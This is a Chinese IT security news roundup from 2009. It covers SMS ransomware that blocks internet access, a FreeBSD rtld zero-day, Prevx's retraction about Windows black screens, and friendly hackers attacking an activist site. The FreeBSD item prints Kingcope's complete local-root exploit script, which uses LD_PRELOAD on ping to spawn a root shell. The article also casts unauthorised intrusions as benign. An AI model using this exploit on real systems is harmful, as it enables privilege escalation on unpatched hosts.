您现在的位置是:首页 > IT基础架构 > 网络与安全 >

曝可切断网络连接恶意软件

2009-12-08 23:08:00作者: 来源:

摘要最近网络上出现了一种新型的勒索方式,俄罗斯网络流氓们开发了一种新型流氓软件,这种病毒软件可以切断用户的互联网连接。另据国外媒体报道,英国安全公司Prevx向微软道歉,表示黑屏问题与补丁无关。而向来被人唾骂的黑客却也有着善意和可爱的一面,继报道保钓联合会网站被黑...

最近网络上出现了一种新型的勒索方式,俄罗斯网络流氓们开发了一种新型流氓软件,这种病毒软件可以切断用户的互联网连接。另据国外媒体报道,英国安全公司Prevx向微软道歉,表示黑屏问题与补丁无关。而向来被人唾骂的黑客却也有着善意和可爱的一面,继报道保钓联合会网站被黑的消息后,数百名网友表示愿意提供网络安全资讯和设备软件,更有黑客甚至通过攻击网站的形式进行善意提醒。

  1、可切断用户互联网连接:俄罗斯网络流氓开发出新型流氓勒索软件

  最近网络上出现了一种新型的勒索方式,俄罗斯网络流氓们开发了一种名为uFast Download Manager的新型流氓软件,这种病毒软件可以切断用户的互联网连接,并要求用户向一个指定的俄罗斯境内电话号码发送收费短信,通过这种卑鄙的方式来敛财。

  感染了这种病毒的用户会收到一条以俄文撰写的信息,这条信息要求用户发送一条收费短信,以获取这款流氓软件的注册码,信息同时还警告称由于用户违反了这款流氓软件的授权协议,因此其互联网连接已被屏蔽,需要取得软件注册码后才能重新开启互联网连接。

  过去曾有其它种类的流氓软件会将用户的文档进行加密和屏蔽处理。2008年一月份,有一款流氓软件会锁住用户的Windows操作系统,并要求用户发送收费短信给指定的号码。不过这款软件似乎与俄罗斯无关,而且也不会切断用户的互联网连接,不过它和这次的流氓软件行为非常相似。

  杀软厂商CA将这种病毒标记为RansomSMS-AH病毒,该厂商并在自己的博客上详细解释了这款流氓软件的工作原理,并提供了感染这种病毒的系统截图。目前这家杀毒厂商已经开发出了一款序列号生成器,使用这种生成器生成的软件序列号,用户无需发送收费短信便可“激活”自己的互联网连接。

  2、FreeBSD爆严重安全漏洞 安全专家称疑是圣诞前的礼物

  在圣诞节即将到来的日子,以安全著称的FreeBSD系统被著名黑客Kingcope爆了一个零日(0day)漏洞。据Kingcope所说,他长期致力于挖掘FreeBSD系统的本地提权漏洞,终于有幸在近期发现了这个非常低级的本地提权漏洞;这个漏洞存在于FreeBSD的Run-Time Link-Editor(rtld)程序中,普通用户可以通过该漏洞非常轻易的获得root权限。该漏洞影响非常广泛,包括FreeBSD 7.1至8.0的32及64位系统。

  在展示该漏洞威力之前,我们先了解一下著名黑客kingcope。从2007年6月至今,他一共公开了12个安全漏洞(没公开的不知道有多少),其中 FreeBSD和Sun Solaris各两个,微软四个,Oracle、mysql、NcFTPD和nginx各一个,同时他还编写了多个漏洞的攻击代码,例如 Sun Solaris telnetd及近期的IIS FTPd、Debian OpenSSH等。

  接下来我们在最新的FreeBSD 8.0中重现一下该漏洞的攻击过程,请注意图中的红色部分;我们只要执行名为fbsd8localroot.sh的脚本,就可以轻易的获得root权限。

 

  相关脚本如下:

  #!/bin/sh

  echo “FreeBSD local r00t zeroday by Kingcope on November 2009″

  cat > env.c << _EOF

  #include

  main() {

  extern char **environ;

  environ = (char**)malloc(8096);

  environ[0] = (char*)malloc(1024);

  environ[1] = (char*)malloc(1024);

  strcpy(environ[1], “LD_PRELOAD=/tmp/w00t.so.1.0″);

  execl(”/sbin/ping”, “ping”, 0);

  }

  _EOF

  gcc env.c -o env > /dev/null 2>&1

  #download from baoz.net

  cat > program.c << _EOF

  #include

  #include

  #include

  #include

  void _init() {

  extern char **environ;

  environ=NULL;

  system(”echo ALEX-ALEX;/bin/sh”);

  }

  _EOF

  gcc -o program.o -c program.c -fPIC ; gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -

  nostartfiles ; cp w00t.so.1.0 /tmp/w00t.so.1.0 ;./env

  FreeBSD尚未就该0day漏洞发布安全公告及官方补丁,敬请关注素包子的博客http://baoz.net/freebsd8-localroot-0day/以获取该漏洞的最新情况。

  3、英国安全公司向微软道歉:黑屏问题与补丁无关

  北京时间12月2日中午消息,据国外媒体报道,英国安全公司Prevx周二发表博客文章称,已经进一步缩小了Windows黑屏死机事件的诱因,并且排除了最新Windows补丁触发黑屏事件的可能性,该公司还就因此引发的不便向微软道歉。

 

  以下为Prevx博客全文:

  在前面的博客文章中,我们已经提到我们正在与微软一同解决黑屏死机问题。在寻找黑屏原因的过程中,我们已经有了一些重要进展。

  该问题似乎与Windows注册表字符串数据存储的一个特性有关。在对Shell(命令解释程序)的注册表键值进行解析时,Windows需要一个“REG_SZ”空值终止字符串。然而,如果恶意软件或是其他程序修改了Shell入口,使之不包含空值终止字符串,Shell便无法正确载入,从而导致黑屏,而只显示“我的电脑”文件夹。

  SysInternals在多年前便成为第一个发现这一注册表特性的企业之一,并推出了RegHide工具(http://technet.microsoft.com/en-us/sysinternals/bb897446.aspx),可以用来修正注册表入口,以确保无法从操作系统内部访问这些入口。这一技术通常被恶意软件利用,正因如此,无论其内容是否包含空值终止符,该工具都推荐首先查询一个注册表键值的长度,然后将其读入缓冲区,再强制性加入空值终止字符串。

  在缩小了本次黑屏死机事件的诱因范围后,我们已经对KB976098和KB915597两个最新的Windows补丁程序进行了大量的反复测试,这一点我们已经在前面的博客文章中说过。由于黑屏原因被进一步缩小,所以便可将这些补丁从黑屏死机的可能诱因中排除。

  至于这一过程中,操作系统解释(OS interpretation)或其他注册表键值是否发生改变,我们尚未进行进一步分析。无论如何,我们认为使用SysInternals文章中所推荐的键值长度将对操作系统有很大益处。

  我们一直以来都强烈推荐Windows和其他软件用户更新最新的补丁,从而减少新漏洞所产生的威胁。如果我们有任何新的发现都会进一步发布最新信息。

  我们为我们的博客有可能引发的不便向微软道歉。这个问题的确很难确定。遭遇黑屏问题的用户仍然可以安全使用我们所推荐的免费修复工具来恢复桌面图标和任务栏。

  4、善意黑客帮中国保钓网修补安全漏洞

  继报道保钓联合会网站被黑的消息后,昨天,数百名网友表示愿意提供网络安全资讯和设备软件。值得一提的是,一些黑客甚至通过攻击网站的形式进行善意提醒。

  据中国民间保钓联合会常务会员周文博透露,当天数百名网友通过电子邮件、电话等方式为他们提供网络安全的有关资讯。此外,联合会网站当天又遭遇黑客的攻击,不过这些来自国内黑客的攻击都是出于善意的。其中一名黑客修改了联合会论坛的部分网友,以提醒网管网站还存在漏洞,该黑客还留下了自己的QQ号以方便网站的网管和他取得联系。

  据悉,爱国者同盟网也曾经多次被攻击过,最严重的一次是2003年12月13日。当天,该网站的流量猛增至平时的5倍。此后,该网站采取了多项安全措施,并接受了一些安全系统的赠送。截至目前,爱国者同盟网还没有被攻陷过。


(本文不涉密)
责任编辑:

站点信息

  • 运营主体:中国信息化周报
  • 商务合作:赵瑞华 010-88559646
  • 微信公众号:扫描二维码,关注我们